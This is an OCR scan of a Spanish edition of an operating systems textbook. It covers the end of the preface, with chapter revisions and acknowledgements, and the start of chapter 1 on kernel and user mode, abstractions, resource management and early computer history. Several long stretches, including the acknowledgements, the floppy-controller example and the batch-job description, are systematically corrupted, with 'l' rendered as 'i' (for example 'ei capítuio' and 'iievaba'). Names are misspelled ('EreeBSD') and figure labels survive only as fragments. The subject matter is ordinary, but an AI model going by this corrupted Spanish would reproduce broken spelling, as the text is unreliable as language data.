los procesos, espacios de direcciones virtuales y archivos son los conceptos clave que proporcionan 
los sistemas operativos, y es la razón por la que hayamos colocado los capítulos correspondientes 
antes de lo establecido en la edición anterior. 

El capítulo 1 se modificó y actualizó de manera considerable. Por ejemplo, ahora proporciona 
una introducción al lenguaje de programación C y al modelo de C en tiempo de ejecución para los 
lectores que están familiarizados sólo con Java. 

En el capítulo 2, el análisis de los hilos (threads) se modificó y expandió para reflejar su nue¬ 
va importancia. Entre otras cosas, ahora hay una sección acerca de los hilos Pthreads del estándar 
de IEEE. 

El capítulo 3, sobre la administración de memoria, se reorganizó para poner énfasis en la idea 
de que una de las funciones clave de un sistema operativo es proporcionar la abstracción de un es¬ 
pacio de direcciones virtuales para cada proceso. Se eliminó el material que trata de la administra¬ 
ción de memoria en los sistemas de procesamiento por lotes, y se actualizó el referente a la 
implementación de la paginación, con el fin de destacar la necesidad de administrar espacios de di¬ 
recciones más extensos (ahora muy comunes) y de ofrecer una mayor velocidad. 
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Se actualizaron los capítulos 4 a 7: se eliminó cierto material anterior y se agregó nuevo. Las 
secciones sobre las actividades actuales de investigación en estos capítulos se reescribieron desde 
cero y se agregaron muchos nuevos problemas y ejercicios de programación. 

Se actualizó el capítulo 8, incluyendo cierto material acerca de los sistemas multinúcleo. Se 
agregó una nueva sección sobre la tecnología de hipervirtualización, los hipervisores y las máqui¬ 
nas virtuales, donde se utilizó VMware como ejemplo. 

El capítulo 9 se modificó y reorganizó de manera considerable, con mucho material actuali¬ 
zado referente a la explotación de los errores (bugs) en el código, el malware y las defensas con¬ 
tra éstos. 

El capítulo 10, que trata acerca de Linux, es una readaptación del anterior (que trataba so¬ 
bre UNIX y Linux). Sin duda, ahora el énfasis está en Linux y hay una gran cantidad de mate¬ 
rial nuevo. 

El capítulo 11, sobre Windows Vista, es una importante revisión del capítulo 11 anterior, que 
trataba de Windows 2000. Este capítulo muestra un análisis completamente actualizado de Win¬ 
dows. 

El capítulo 12 es nuevo. A mi parecer, los sistemas operativos embebidos, o incrustados (co¬ 
mo los que se encuentran en los teléfonos celulares y los asistentes digitales personales, o PDAs) 
se ignoran en la mayoría de los libros de texto, a pesar de que hay más de estos dispositivos en 
el mercado que PCs y computadoras portátiles. Esta edición remedia este problema con un aná¬ 
lisis extendido de Symbian OS, que se utiliza ampliamente en los teléfonos inteligentes (Smart 
Phones). 

El capítulo 13, sobre el diseño de sistemas operativos, no presenta modificaciones importantes. 

Este libro pone a su disposición una gran cantidad de material didáctico de apoyo. Los suple¬ 
mentos para el instructor se encuentran en el sitio web de este libro: WWW.pearsoneducacion.net/ 
tanembaum, e incluyen diapositivas de PowerPoint, herramientas de software para estudiar sistemas 
operativos, experimentos de laboratorio para los estudiantes, simuladores y material adicional para 
utilizar en sus cursos. Los instructores que utilicen este libro como texto definitivamente deben dar¬ 
le un vistazo. 

Varias personas me ayudaron con esta revisión. En primer lugar deseo agradecer a mi editora, 
Tracy Dunkelberger. Este es mi libro número 18 y he desgastado a muchos editores en el proceso. Tracy 
fue más allá del cumplimiento de su deber con este libro, ya que hizo cosas tales como buscar colabo¬ 
radores, organizar varias reseñas, ayudar con todos los suplementos, lidiar con los contratos, actuar 
como intermediario con PH, coordinar una gran cantidad de procesamiento en paralelo y, en general, 
asegurarse de que todo saliera a tiempo, además de otras cosas. También me ayudó a mantener un es¬ 
tricto itinerario de trabajo para poder lograr que este libro se imprimiera a tiempo, e hizo todo esto man¬ 
teniéndose animosa y alegre, a pesar de tener muchas otras actividades que exigían gran parte de su 
atención. Gracias Tracy, en verdad te lo agradezco. 

Ada Gavrilovska de Georgia Tech, experta en los aspectos internos sobre Linux, actualizó el 
capítulo 10 que estaba basado en UNIX (con énfasis en EreeBSD) para convertirlo en algo más en¬ 
focado en Linux, aunque gran parte del capítulo sigue siendo genérico para todos los sistemas 
UNIX. Linux es más popular entre los estudiantes que EreeBSD, por lo que éste es un cambio im¬ 
portante. 

Dave Probert de Microsoft actualizó el capítulo 11, que estaba basado en Windows 2000, para 
concentrarlo en Windows Vista. Aunque tienen varias similitudes, también tienen diferencias con¬ 
siderables. Dave conoce mucho de Windows y tiene suficiente visión como para poder indicar la 
diferencia entre los puntos en los que Microsoft hizo lo correcto y en los que se equivocó. Como 
resultado de su trabajo este libro es mucho mejor. 
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PREFACIO 


M ikejipping de Hope College escribió ei capítuio acerca deSymbian OS. No abordar ios sis¬ 
temas embebidos en tiempo reai era una grave omisión en ei iibro; gracias a M ike se resoivió ese 
probiema. Los sistemas embebidos en tiempo reai se están voiviendo cada vez más importantes en 
ei mundo, y este capítuio ofrece una exceiente introducción ai tema. 

A diferencia de A da, Davey M ike, cada uno de ios cuaies se enfocó en un capítuio, Shivakant 
M ishra, de ia University of Coiorado en Bouider, fungió más como un sistema distribuido, ieyendo 
y haciendo comentarios sobre muchos capítuios, además de proporcionar una gran cantidad de ejer¬ 
cicios y probiemas de programación nuevos a io iargo dei iibro. 

Hugh Lauer también merece una mención especiai. Cuando ie pedimos ideas sobre cómo re¬ 
visar ia segunda edición, no esperábamos un informe de 23 páginas con interiineado sencido; y 
sin embargo eso fue io que obtuvimos. M uchos de ios cambios, como ei nuevo énfasis sobre ias 
abstracciones de ios procesos, ios espacios de direcciones y ios archivos, se deben a su participa¬ 
ción. 

También quiero agradecer a otras personas que me ayudaron de muchas formas, inciuyendo ei 
sugerir nuevos temas a cubrir, ieer ei manuscrito con cuidado, hacer supiementos y contribuir con 
nuevos ejercicios. Entre eiios Steve Armstrong, jeffrey Chastine, John Conneiiy, Mischa Geider- 
mans, Paui Gray, james Griffioen, jorrit Herder, M ichaei Howard, Suraj Kothari, Roger Kraft, 
Trudy Levine, John Masiyowski, Shivakant M ishra, Rudy Pait, Xiao Qin, Mark Russinovich, 
Krishna Sivaiingam, Leendert van Doorn y Ken Wong. 

Ei personai de Prentice Haii fue amistoso y cooperativo como siempre, en especiai IrwinZuc- 
ker y Scott Disanno en producción, y David Aiick, ReeA nne Davies y M eiinda Haggerty en edito- 
riai. 

Por úitimo, pero no por eiio menos importante. Barbara y M arvin siguen siendo maraviiiosos, 
como siempre, cada uno en una forma especiai y única. Y desde iuego, quiero agradecer a Suzan- 
ne por su amor y paciencia recientes. 
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INTRODUCCIÓN 


Una computadora moderna consta de uno o más procesadores, una memoria principal, discos, im¬ 
presoras, un teclado, un ratón, una pantalla o monitor, interfaces de red y otros dispositivos de en¬ 
trada/salida. En general es un sistema complejo. Si todos los programadores de aplicaciones 
tuvieran que comprender el funcionamiento de todas estas partes, no escribirían código alguno. Es 
más: el trabajo de administrar todos estos componentes y utilizarlos de manera óptima es una tarea 
muy desafiante. Por esta razón, las computadoras están equipadas con una capa de software llama¬ 
da sistema operativo, cuyo trabajo es proporcionar a los programas de usuario un modelo de compu¬ 
tadora mejor, más simple y pulcro, así como encargarse de la administración de todos los recursos 
antes mencionados. Los sistemas operativos son el tema de este libro. 

La mayoría de los lectores habrán tenido cierta experiencia con un sistema operativo como 
Windows, Linux, FreeBSD o Mac OS X, pero las apariencias pueden ser engañosas. El progra¬ 
ma con el que los usuarios generalmente interactúan se denomina shell, cuando está basado en 
texto, y GUI (Graphical User Interface; Interfaz gráfica de usuario) cuando utiliza elementos 
gráficos o iconos. En realidad no forma parte del sistema operativo, aunque lo utiliza para llevar 
a cabo su trabajo. 

La figura 1-1 presenta un esquema general de los componentes principales que aquí se anali¬ 
zan. En la parte inferior se muestra el hardware, que consiste en circuitos integrados (chips), tarje¬ 
tas, discos, un teclado, un monitor y objetos físicos similares. Por encima del hardware se encuentra 
el software. La mayoría de las computadoras tienen dos modos de operación: modo kernel y modo 
usuario. El sistema operativo es la pieza fundamental del software y se ejecuta en modo kernel 
(también conocido como modo supervisor). En este modo, el sistema operativo tiene acceso 
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completo a todo el hardware y puede ejecutar cualquier instrucción que la máquina sea capaz de 
ejecutar. El resto del software se ejecuta en modo usuario, en el cual sólo un subconjunto de las 
instrucciones de máquina es permitido. En particular, las instrucciones que afectan el control déla má¬ 
quina o que se encargan de la E/S (entrada/salida) están prohibidas para los programas en modo 
usuario. Volveremos a tratar las diferencias entre el modo kernel y el modo usuario repetidamente 
a lo largo de este libro. 
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Figura 1-1. Ubicación del sistema operativo. 


El programa de interfaz de usuario, shell o GUI, es el nivel más bajo del software en modo 
usuario y permite la ejecución de otros programas, como un navegador Web, lector de correo elec¬ 
trónico o reproductor de música. Estos programas también utilizan en forma intensiva el sistema 
operativo. 

La ubicación del sistema operativo se muestra en la figura 1-1. Se ejecuta directamente sobre 
el hardware y proporciona la base para las demás aplicaciones de software. 

Una distinción importante entre el sistema operativo y el software que se ejecuta en modo usua¬ 
rio es que, si a un usuario no le gusta, por ejemplo, su lector de correo electrónico, es libre de con¬ 
seguir otro o incluso escribir el propio si así lo desea; sin embargo, no es libre de escribir su propio 
manejador de interrupciones de reloj, que forma parte del sistema operativo y está protegido por el 
hardware contra cualquier intento de modificación por parte de los usuarios. 

Algunas veces esta distinción no es clara en los sistemas integrados (a los que también se co¬ 
noce como integrados o incrustados, y que podrían no tener modo kernel) o en los sistemas inter¬ 
pretados (como los sistemas operativos basados en j ava que para separar los componentes utilizan 
interpretación y no el hardware). 

Además, en muchos sistemas hay programas que se ejecutan en modo de usuario, pero ayudan 
al sistema operativo o realizan funciones privilegiadas. Por ejemplo, a menudo hay un programa que 
permite a los usuarios cambiar su contraseña. Este programa no forma parte del sistema operativo y 
no se ejecuta en modo kernel, pero sin duda lleva a cabo una función delicada y tiene que proteger- 
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se de una manera especial. En ciertos sistemas, la idea se lleva hasta el extremo y partes de lo que 
tradicional mente se considera el sistema operativo (por ejemplo, el sistema de archivos) se ejecutan 
en el espacio del usuario. En dichos sistemas es difícil trazar un límite claro. Todo lo que se ejecuta en 
modo kernel forma, sin duda, parte del sistema operativo, pero podría decirse que algunos progra¬ 
mas que se ejecutan fuera de este modo también forman parte del mismo sistema, o por lo menos es¬ 
tán estrechamente asociados a él. 

Los sistemas operativos difieren de los programas de usuario (es decir, de aplicación) en varias 
cuestiones además del lugar en el que residen. En particular, son enormes, complejos y de larga du¬ 
ración. El código fuente de un sistema operativo como Linux o Windows contiene cerca de cinco 
millones de líneas de código. Para tener una idea de lo que esto significa, considere el trabajo de 
imprimir cinco millones de líneas en un formato de libro: con 50 líneas por página y 1000 páginas 
por volumen, se requerirían 100 volúmenes para listar un sistema operativo de este tamaño: es de¬ 
cir, todo un librero. Imagine el lector que tiene un trabajo como encargado de dar mantenimiento a 
un sistema operativo y que en su primer día su jefe le presenta un librero con el código y le dice: 
"A préndase todo esto". Y ésta sólo sería la parte que se ejecuta en el kernel. Los programas de usua¬ 
rio como la interfaz gráfica, las bibliotecas y el software de aplicación básico (como el Explorador 
de Windows) pueden abarcar fácilmente de 10 a 20 veces esa cantidad. 

En este punto, el lector debe tener una idea clara de por qué los sistemas operativos tienen una 
larga vida: es muy difícil escribir uno y, por lo tanto, el propietario se resiste a tirarlo y empezar de 
nuevo. En vez de ello, evolucionan durante periodos extensos. Windows 95/98/M ees, esencialmen¬ 
te, un sistema operativo distinto de Windows NT/2000/X P/Vista, su sucesor. Tienen una apariencia 
similar para los usuarios, ya que M icrosoft se aseguró bien de ello, sin embargo, tuvo muy buenas 
razones para deshacerse de Windows 98, las cuales describiremos cuando estudiemos Windows con 
detalle en el capítulo 11. 

El otro ejemplo principal que utilizaremos a lo largo de este libro (además de Windows) es 
UN IX, con sus variantes y clones. También ha evolucionado a través de los años con versiones ta¬ 
les como System V, Solaris y FreeBSD que se derivan del sistema original, mientras que Linux tie¬ 
ne una base de código nueva, modelada estrechamente de acuerdo con U NIX y altamente compatible 
con él. Utilizaremos ejemplos de UNIX a lo largo de este libro y analizaremos Linux con detalle en 
el capítulo 10. 

E n este capítulo hablaremos brevemente sobre varios aspectos clave de los sistemas operativos, 
incluyendo en síntesis qué son, cuál es su historia, cuáles son los tipos que existen, algunos de los 
conceptos básicos y su estructura. En capítulos posteriores volveremos a hablar sobre muchos de 
estos tópicos importantes con más detalle. 


1.1 ¿QUÉ ES UN SISTEMA OPERATIVO? 

Es difícil definir qué es un sistema operativo aparte de decir que es el software que se ejecuta en 
modo kernel (además de que esto no siempre es cierto). Parte del problema es que los sistemas ope¬ 
rativos realizan dos funciones básicas que no están relacionadas: proporcionar a los programadores 
de aplicaciones (y a los programas de aplicaciones, naturalmente) un conjunto abstracto de recur¬ 
sos simples, en vez de los complejos conjuntos de hardware: y administrar estos recursos de hard- 
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ware. Dependiendo de quién se esté habiando, ei iector podría escuchar más acerca de una función 
o de i a otra. Ahora anai izaremos ambas. 

1.1.1 EI sistema operativo como una máquina extendida 

La arquitectura (conjunto de instrucciones, organización de memoria, E/S y estructura de bus) de 
ia mayoría de ias computadoras a nivei de ienguaje máquina es primitiva y compieja de programar, 
en especiai para i a entrada/sai i da. Para hacer este punto más concreto, considere i a forma en que se 
iieva a cabo ia E/S de disco fiexibie mediante ios dispositivos controiadores (device controiiers) 
compatibies NEC PD765 que se utiiizan en ia mayoría de ias computadoras personaies basadas en 
Intei (a io iargo de este iibro utiiizaremos ios términos "disco fiexibie" y "diskette" indistintamen¬ 
te). Utiiizamos ei disco fiexibie como un ejempio debido a que, aunque obsoieto, es mucho más 
simpie que un disco duro moderno. Ei PD765 tiene 16 comandos, cada uno de ios cuaies se espe¬ 
cifica mediante ia carga de 1 a 9 bytes en un registro de dispositivo. Estos comandos son para ieer 
y escribir datos, despiazar ei brazo dei disco y dar formato a ias pistas, así como para iniciaiizar, de¬ 
tectar, restabiecery recaiibrarei dispositivo controiadory ias unidades. 

Los comandos más básicos son read y write (iectura y escritura), cada uno de ios cuaies re¬ 
quiere 13 parámetros, empaquetados en 9 bytes. Estos parámetros especifican dementas taies co¬ 
mo ia dirección dei bioque de disco a ieer, ei número de sectores por pista, ei modo de grabación 
utiiizado en ei medio físico, ei espacio de separación entre sectores y io que se debe hacer con una 
marca de dirección de datos eiiminados. Si ei iector no comprende estos tecnicismos, no se preocu¬ 
pe: ése es precisamente ei punto, pues se trata deaigo bastante oscuro. Cuando ia operación secom- 
pieta, ei chip dei dispositivo controiador devueive 23 campos de estado y error, empaquetados en 
7bytes.Como si esto no fuera suficiente, ei programador dei disco fiexibietambién debe estar cons¬ 
tantemente ai tanto de si ei motor está encendido o apagado. Si ei motor está apagado, debe encen¬ 
derse (con un retraso iargo de arranque) para que ios datos puedan ser ieídos o escritos. Ei motor 
no se debe dejar demasiado tiempo encendido porque se desgastará. Por io tanto, ei programador se 
ve obiigado a iidiar con ei probiema de eiegir entre tener retrasos iargos de arranque o desgastar ios 
discos fiexibies (y iiegar a perder ios datos). 

Sin entrar en ios detaiies reaies, debe quedar ciaro que ei programador promedio tai vez no de¬ 
see invoiucrarse demasiado con ia programación de ios discos fiexibies (o de ios discos duros, que 
son aún más compiejos). En vez deeiio, io que desea es una abstracción simpie de aito nivei que se 
encargue de iidiar con ei disco. En ei caso de ios discos, una abstracción común sería que ei disco 
contiene una coiección de archivos con nombre. Cada archivo puede ser abierto para iectura o escri¬ 
tura, después puede ser ieído o escrito y, por úitimo, cerrado. Los detaiies, taies como si ia grabación 
debe utiiizar o no ia moduiación de frecuencia y cuái es ei estado dei motor en un momento dado, 
no deben aparecer en ia abstracción que se presenta ai programador de apiicaciones. 

La abstracción es ia ciave para iidiar con ia compiejidad. Las buenas abstracciones convierten 
una tarea casi imposibie en dos tareas manejabies. La primera de éstas es definir e impiementar ias 
abstracciones: ia segunda, utiiizarias para resoiverei probiema en cuestión. Una abstracción que ca¬ 
si cuaiquier usuario de computadora comprende es ei archivo: es una pieza útii de información, co¬ 
mo una fotografía digitai, un mensaje de correo eiectrónico aimacenado o una página Web. Es más 
fácii iidiar con fotografías, correos eiectrónicos y páginas Web que con ios detaiies de ios discos. 
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como en el caso del disco flexible descrito. El trabajo del sistema operativo es crear buenas abstrac¬ 
ciones para después implementary administrar los objetos abstractos entonces creados. En este li¬ 
bro hablaremos mucho acerca de las abstracciones, dado que son claves para comprender los 
sistemas operativos. 

Este punto es tan importante que vale la pena repetirlo en distintas palabras. Con el debido 
respeto a los ingenieros industriales que diseñaron la M acintosh, el hardware es feo. Los procesa¬ 
dores, memorias, discos y otros dispositivos reales son muy complicados y presentan interfaces di¬ 
fíciles, enredadas, muy peculiares e inconsistentes para las personas que tienen que escribir 
software para utilizarlos. Algunas veces esto se debe a la necesidad detener compatibilidad con el 
hardware anterior; otras, a un deseo de ahorrar dinero, y otras más, a que los diseñadores de hard¬ 
ware no tienen idea (o no les importa) qué tan gravees el problema que están ocasionando para el 
software. U na de las principales tareas del sistema operativo es ocultar el hardware y presentar a 
los programas (y a sus programadores) abstracciones agradables, elegantes, simples y consisten¬ 
tes con las que puedan trabajar. Los sistemas operativos ocultan la parte fea con la parte hermosa, 
como se muestra en la figura 1-2. 



■<— Interfaz hermosa 


Interfaz fea 


Figura 1-2. Los sistemas operativos ocultan el hardware feo con abstracciones hermosas. 


Hay que recalcar que los verdaderos clientes del sistema operativo son los programas de apli¬ 
cación (a través de los programadores de aplicaciones, desde luego). Son los que tratan directamen¬ 
te con el sistema operativo y sus abstracciones. En contraste, los usuarios finales tienen que lidiar 
con las abstracciones que proporciona la interfaz de usuario, ya sea un shell de línea de comandos 
o una interfaz gráfica. Aunque las abstracciones en la interfaz de usuario pueden ser similares a las 
que proporciona el sistema operativo, éste no siempre es el caso. Para aclarar este punto, considere 
el escritorio normal de Windows y el indicador para comandos orientado a texto. Ambos son pro¬ 
gramas que se ejecutan en el sistema operativo Windows y utilizan las abstracciones que este siste¬ 
ma proporciona, pero ofrecen interfaces de usuario muy distintas. De manera similar, un usuario de 
Linux que ejecuta Gnome o KDE ve una interfaz muy distinta a la que ve un usuario de Linux que 
trabaja directamente encima del Sistema X Window subyacente (orientado a texto), pero las abs¬ 
tracciones del sistema operativo subyacente son las mismas en ambos casos. 
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En este libro estudiaremos detalladamente las abstracciones que se proporcionan a los progra¬ 
mas de aplicación, pero trataremos muy poco acerca de las interfaces de usuario, que es un tema 
bastante extenso e importante, pero que sólo está relacionado con la periferia de los sistemas ope¬ 
rativos. 


1.1.2 EI sistema operativo como administrador de recursos 

El concepto de un sistema operativo cuya función principal es proporcionar abstracciones a los pro¬ 
gramas de aplicación responde a una perspectiva de arriba hacia abajo. La perspectiva alterna, de 
abajo hacia arriba, sostiene que el sistema operativo está presente para administrar todas las piezas 
de un sistema complejo. Las computadoras modernas constan de procesadores, memorias, tempo- 
rizadores, discos, ratones, interfaces de red, impresoras y una amplia variedad de otros dispositivos. 
En la perspectiva alterna, el trabajo del sistema operativo es proporcionar una asignación ordenada 
y controlada de los procesadores, memorias y dispositivos de E/S, entre los diversos programas que 
compiten por estos recursos. 

Los sistemas operativos modernos permiten la ejecución simultánea de varios programas. Ima¬ 
gine lo que ocurriría si tres programas que se ejecutan en cierta computadora trataran de imprimir 
sus resultados en forma simultánea en la misma impresora. Las primeras líneas de impresión po¬ 
drían provenir del programa 1, las siguientes del programa 2, después algunas del programa 3, y así 
en lo sucesivo: el resultado sería un caos. El sistema operativo puede imponer orden al caos poten¬ 
cial, guardando en búferes en disco toda la salida destinada para la impresora. Cuando termina un 
programa, el sistema operativo puede entonces copiar su salida, previamente almacenada, del archi¬ 
vo en disco a la impresora, mientras que al mismo tiempo el otro programa puede continuar gene¬ 
rando más salida, ajeno al hecho de que la salida en realidad no se está enviando a la impresora 
todavía. 

Cuando una computadora (o red) tiene varios usuarios, la necesidad de administrar y proteger 
la memoria, los dispositivos de E/S y otros recursos es cada vez mayor; de lo contrario, los usua¬ 
rios podrían interferir unos con otros. Además, los usuarios necesitan con frecuencia compartir no 
sólo el hardware, sino también la información (archivos o bases de datos, por ejemplo). En resu¬ 
men, esta visión del sistema operativo sostiene que su tarea principal es llevar un registro de qué 
programa está utilizando qué recursos, de otorgar las peticiones de recursos, de contabilizar su uso 
y de mediar las peticiones en conflicto provenientes de distintos programas y usuarios. 

La administración de recursos incluye el multiplexaje (compartir) de recursos en dos formas 
distintas: en el tiempo y en el espacio. Cuando un recurso se multiplexa en el tiempo, los distintos 
programas o usuarios toman turnos para utilizarlo: uno de ellos obtiene acceso al recurso, después 
otro, y así en lo sucesivo. Por ejemplo, con sólo una CPU y varios programas que desean ejecutar¬ 
se en ella, el sistema operativo primero asigna la CPU a un programa y luego, una vez que se ha 
ejecutado por el tiempo suficiente, otro programa obtiene acceso a la CPU, después otro, y en un 
momento dado el primer programa vuelve a obtener acceso al recurso. La tarea de determinar có¬ 
mo se multiplexa el recurso en el tiempo (quién sigue y durante cuánto tiempo) es responsabilidad 
del sistema operativo. Otro ejemplo de multiplexaje en el tiempo es la compartición de la impreso¬ 
ra. Cuando hay varios trabajos en una cola de impresión, para imprimirlos en una sola impresora, 
se debe tomar una decisión en cuanto a cuál trabajo debe imprimirse a continuación. 
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El otro tipo demultiplexajees en el espacio. En vez deque los clientes tomen turnos, cada uno 
obtiene una parte del recurso. Por ejemplo, normalmente la memoria principal se divide entre va¬ 
rios programas en ejecución para que cada uno pueda estar residente al mismo tiempo (por ejem¬ 
plo, para poder tomar turnos al utilizar la CPU). Suponiendo que hay suficiente memoria como para 
contener varios programas, es más eficiente contener varios programas en memoria a la vez, en vez 
de proporcionar a un solo programa toda la memoria, en especial si sólo necesita una pequeña frac¬ 
ción. Desde luego que esto genera problemas de equidad y protección, por ejemplo, y corresponde 
al sistema operativo resolverlos. Otro recurso que semultiplexa en espacio es el disco duro. En mu¬ 
chos sistemas, un solo disco puede contener archivos de muchos usuarios al mismo tiempo. A sig¬ 
nar espacio en discoy llevar el registro de quién está utilizando cuáles bloques de disco es una tarea 
típica de administración de recursos común del sistema operativo. 


1.2 HISTORIA DE LOS SISTEMAS OPERATIVOS 

Los sistemas operativos han ido evolucionando a través de los años. En las siguientes secciones 
analizaremos brevemente algunos de los hitos más importantes. Como los sistemas operativos han 
estado estrechamente relacionados a través de la historia con la arquitectura de las computadoras en 
las que se ejecutan, analizaremos generaciones sucesivas de computadoras para ver cómo eran sus 
sistemas operativos. Esta vinculación de generaciones de sistemas operativos con generaciones de 
computadoras es un poco burda, pero proporciona cierta estructura donde de cualquier otra forma 
no habría. 

La progresión que se muestra a continuación es en gran parte cronológica, aunque el desarro¬ 
llo ha sido un tanto accidentado. Cada fase surgió sin esperar a que la anterior terminara completa¬ 
mente. Hubo muchos traslapes, sin mencionar muchos falsos inicios y callejones sin salida. El 
lector debe tomar esto como guía, no como la última palabra. 

La primera computadora digital verdadera fue diseñada por el matemático inglés Charles Bab- 
bage (de 1792 a 1871). A unque Babbage gastó la mayor parte de su vida y fortuna tratando de cons¬ 
truir su "máquina analítica", nunca logró hacer que funcionara de manera apropiada, debido a que 
era puramente mecánica y la tecnología de su era no podía producir las ruedas, engranes y dientes 
con la alta precisión que requería. Por supuesto, la máquina analítica no tenía un sistema operativo. 

Como nota histórica interesante, Babbage se dio cuenta deque necesitaba software para su má¬ 
quina analítica, por lo cual contrató a una joven llamada Ada Lovelace, hija del afamado poeta bri¬ 
tánico Lord Byron, como la primera programadora del mundo. El lenguaje de programación Ada® 
lleva su nombre. 

1.2.1 La primera generación (1945 a 1955): tubos al vacío 

Después de los esfuerzos infructuosos de Babbage, no hubo muchos progresos en la construcción 
de computadoras digitales sino hasta la Segunda Guerra M undial, que estimuló una explosión de 
esta actividad. El profesor John A tanasoff y su estudiante graduado Clifford Berry construyeron lo 
que ahora se conoce como la primera computadora digital funcional en lowa State University. Uti¬ 
lizaba 300 tubos de vacío (bulbos). Aproximadamente al mismo tiempo, Konrad Zuse en Berlín 
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construyó la computadora Z3 a partir de relevadores. En 1944, la máquina Colossus fue construida 
por un equipo de trabajo en Bletchiey Park, Inglaterra: la M ark I, por Howard Aiken en Harvard, y 
la ENIAC, por William M auchiey y su estudiante graduado j. Presper Eckert en la Universidad de 
Pennsylvania. Algunas fueron binarias, otras utilizaron bulbos, algunas eran programables, pero to¬ 
das eran muy primitivas y tardaban segundos en realizar incluso hasta el cálculo más simple. 

En estos primeros días, un solo grupo de personas (generalmente ingenieros) diseñaban, cons¬ 
truían, programaban, operaban y daban mantenimiento a cada máquina. Toda la programación se 
realizaba exclusivamente en lenguaje máquina o, peor aún, creando circuitos eléctricos mediante 
la conexión de miles de cables a tableros de conexiones (plugboards) para controlar las funciones 
básicas de la máquina. Los lenguajes de programación eran desconocidos (incluso se desconocía 
el lenguaje ensamblador). Los sistemas operativos también se desconocían. El modo usual de ope¬ 
ración consistía en que el programador trabajaba un periodo dado, registrándose en una hoja de 
firmas, y después entraba al cuarto de máquinas, insertaba su tablero de conexiones en la compu¬ 
tadora e invertía varias horas esperando que ninguno de los cerca de 20,000 bulbos se quemara du¬ 
rante la ejecución. Prácticamente todos los problemas eran cálculos numéricos bastante simples, 
como obtener tablas de senos, cosenos y logaritmos. 

A principios de la década de 1950, la rutina había mejorado un poco con la introducción de las 
tarjetas perforadas. Entonces fue posible escribir programas en tarjetas y leerlas en vez de usar ta¬ 
bleros de conexiones: aparte de esto, el procedimiento era el mismo. 


1.2.2 La segunda generación (1955 a 1965): transistores 
y sistemas de procesamiento por lotes 

La introducción del transistor a mediados de la década de 1950 cambió radicalmente el panora¬ 
ma. Las computadoras se volvieron lo bastante confiables como para poder fabricarlas y vender¬ 
las a clientes dispuestos a pagar por ellas, con la expectativa de que seguirían funcionando el 
tiempo suficiente como para poder llevara cabo una cantidad útil de trabajo. Por primera vez ha¬ 
bía una clara separación entre los diseñadores, constructores, operadores, programadores y el per¬ 
sonal de mantenimiento. 

Estas máquinas, ahora conocidas como mainframes, estaban encerradas en cuartos especiales 
con aire acondicionado y grupos de operadores profesionales para manejarlas. Sólo las empresas 
grandes, universidades o agencias gubernamentales importantes podían financiar el costo multimi¬ 
llonario de operar estas máquinas. Para ejecutar un trabajo (es decir, un programa o conjunto de 
programas), el programador primero escribía el programa en papel (en FORTRAN o en ensambla¬ 
dor) y después lo pasaba a tarjetas perforadas. Luegollevaba el conjunto de tarjetas al cuarto de en¬ 
trada de datos y lo entregaba a uno de los operadores: después se iba a tomar un café a esperar a 
que los resultados estuvieran listos. 

Cuando la computadora terminaba el trabajo que estaba ejecutando en un momento dado, un 
operador iba a la impresora y arrancaba las hojas de resultados para llevarlas al cuarto de salida de 
datos, para que el programador pudiera recogerlas posteriormente. Entonces, el operador tomaba 
uno de los conjuntos de tarjetas que se habían traído del cuarto de entrada y las introducía en la má¬ 
quina. Si se necesitaba el compilador FORTRAN, el operador tenía que obtenerlo de un gabinete 
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de archivos e introducirlo a la máquina. Se desperdiciaba mucho tiempo de la computadora mien¬ 
tras los operadores caminaban de un lado a otro del cuarto de la máquina. 

Dado el alto costo del equipo, no es sorprendente que las personas buscaran rápidamente formas 
de reducir el tiempo desperdiciado. La solución que se adoptó en forma general fue el sistema de pro¬ 
cesamiento por lotes. La idea detrás de este concepto era recolectar una bandeja llena de trabajos en 
el cuarto de entrada de datos y luego pasarlos a una cinta magnética mediante el uso de una pequeña 
computadora relativamente económica, tal como la IBM 1401, que era muy adecuada para leer las tar¬ 
jetas, copiar cintas e imprimir los resultados, pero no tan buena para los cálculos numéricos. Para lle¬ 
var a cabo los cálculos numéricos se utilizaron otras máquinas mucho más costosas, como la IBM 
7094. Este procedimiento se ilustra en la figura 1-3. 


Unidad Cinta del 

de cinta Cinta de sistema Salida de 




(a) (b) (c) (d) (e) 


Impresora 



(f) 


Figura 1-3. U no de los primeros sistemas de procesamiento por lotes, a) Los programa- 
dores llevan las tarjetas a la 1401. b) La 1401 lee los lotes de trabajos y los coloca en cin¬ 
ta. c) El operador lleva la cinta de entrada a la 7094. d) La 7094 realiza los cálculos, 
e) El operador lleva la cinta de salida a la 1401. f) La 1401 imprime los resultados. 


Después de aproximadamente una hora de recoiectar un iote de trabajos, ias tarjetas se ieían y 
se coiocaban en una cinta magnética, ia cuai se iievaba ai cuarto de máquinas, en donde se monta¬ 
ba en una unidad de cinta. Después, ei operador cargaba un programa especiai (ei ancestro dei sis¬ 
tema operativo de hoy en día), ei cuai ieía ei primer trabajo deia cinta y io ejecutaba. Losresuitados 
se escribían en una segunda cinta, en vez de imprimidos. Después de que terminaba cada trabajo, 
ei sistema operativo ieía de manera automática ei siguiente trabajo de ia cinta y empezaba a ejecu¬ 
tado. Cuando se terminaba de ejecutar todo ei iote, ei operador quitaba ias cintas de entrada y de 
saiida, reempiazaba ia cinta de entrada con ei siguiente iote y iievaba ia cinta de saiida a una 1401 
para imprimir fuera delinea (es decir, sin conexión con ia computadora principai). 

En ia figura 1-4 se muestra ia estructura típica de un trabajo de entrada ordinario. Empieza con 
una tarjeta $jOB, especificando ei tiempo máximo de ejecución en minutos, ei número de cuenta ai 
que se va a cargar y ei nombre dei programador. Después se utiiiza una tarjeta $FORTRAN, indi¬ 
cando ai sistema operativo que debe cargar ei compiiador FORTRAN deia cinta dei sistema. Des¬ 
pués ie sigue inmediatamente ei programa que se va a compiiar y iuego una tarjeta $LOAD, que 
indica ai sistema operativo que debe cargar ei programa objeto que acaba de compiiar (a menudo, 
ios programas compiiados se escribían en cintas reutiiizabiesy tenían que cargarse en forma expií- 
cita). Después se utiiiza ia tarjeta $RUN, ia cuai indica ai sistema operativo que debe ejecutar ei 
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programa con los datos que le suceden. Por último, la tarjeta $END marca el final del trabajo. Es¬ 
tas tarjetas de control primitivas fueron las precursoras de los shells e intérpretes de línea de coman¬ 
dos modernos. 



Las computadoras grandes de segunda generación se utilizaron principalmente para cálculos 
científicos y de ingeniería, tales como resolver ecuaciones diferenciales parciales que surgen a me¬ 
nudo en física e ingeniería. En gran parte se programaron en FORTRAN y lenguaje ensamblador. 
Los sistemas operativos típicos eran FM S (Fortran M onitor System) e IBSY S, el sistema operativo 
